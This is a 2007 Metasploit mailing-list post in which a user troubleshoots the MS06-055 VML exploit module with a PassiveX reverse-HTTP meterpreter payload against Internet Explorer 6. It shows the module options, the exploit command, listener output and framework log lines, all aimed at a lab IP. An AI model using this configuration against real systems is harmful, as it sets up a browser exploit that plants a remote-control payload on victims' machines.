PassiveX-based payloads and MS06-055

[buffer at softmedia.info (Angelo Dell'Aera)]

Il giorno Tue, 13 Mar 2007 09:42:32 -0700
mmiller at hick.org ha scritto:

> A few quick things to check:
>
> 1) What version of IE is installed on the machine?  I'm assuming IE 6,
> but just need to be sure.

You're right... IE 6. 


> 2) What happens when you manually bring up the PX site after the
> values have been successfully altered?  In the previous example, you
> could try browsing to:
>
> http://192.168.33.130:10000//OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s
>
> There might be some additional information you can collect by doing
> 'setg LogLevel 3' and then taking a look at
> ~/.msf3/logs/framework.log.

Following what you suggested me...

msf exploit(ms06_055_vml_method) > show options

Module options:

Name     Current Setting  Required Description 
-------------------  -------- ----------- 
SRVHOST  192.168.33.130 yes       The local host to listen on. 
SRVPORT   8080                  yes       The local port to listen on.
URIPATH    up                       no        The URI to use for this
                                exploit (default is random)  


Payload options:

Name       Current Setting     Required Description 
------------------- --------  -----------
DLL        /home/buffer/msf3/data/meterpreter/metsrv.dll  yes       The
                                        local path to the DLL to upload
EXITFUNC seh                yes       Exit technique: seh, thread,
                                                        process
PXAXCLSID B3AC7307-FEAE-4e43-B2D6-161E68ABA838 yes       ActiveX CLSID
PXAXDLL    /home/buffer/msf3/data/passivex/passivex.dll   yes ActiveX
                                                        DLL to inject
PXAXVER -1,-1,-1,-1       yes   ActiveX DLL Version
PXHOST 192.168.33.130 yes       The local HTTP listener hostname
PXPORT 8080               yes   The local HTTP listener port
PXURI      /px                    no          The URI root for
                                                        requests             


Exploit target:

   Id  Name                                
   --  ----                                
   0   Windows NT 4.0 -> Windows 2003 SP1  


msf exploit(ms06_055_vml_method) > exploit
[*] PassiveX listener started.
[*] Using URL: http://192.168.33.130:8080/up
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) > 
[*] Sending PassiveX main page to client 
[*] Sending PassiveX main page to client

The second "Sending..." message was displayed when I tried to directly
browsing 

        http://192.168.33.130:8080/px

but it seems nothing still happens at all. Looking at this behavior it
seems to me the first stage gets executed and that the browser asks for
the PXHOST even in the first case but after this step nothing else.

These are the most significant lines in framework.log

[03/13/2007 18:20:29] [d(2)] core: windows/meterpreter/reverse_http:
Successfully encoded with encoder x86/shikata_ga_nai (size is 479)
[03/13/2007 18:20:29] [d(2)] core: PassiveX listener started on
http://192.168.33.130:8080/px 
[03/13/2007 18:20:41] [e(0)] rex: Failed to find handler for
resource: / 
[03/13/2007 18:20:47] [d(2)] core: windows/meterpreter/reverse_http:
Successfully encoded with encoder x86/shikata_ga_nai (size is 479)
[03/13/2007 18:21:15] [e(0)] rex: Failed to find handler for resource: /

After looking at this last log message I even tried setting PXURI to /
and to an empty string but no results at all even in this case.

Regards,

-- 

Angelo Dell'Aera 'buffer' 
Antifork Research, Inc.         http://buffer.antifork.org
Metro Olografix

PGP information in e-mail header


-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070313/cb22a4be/attachment.pgp>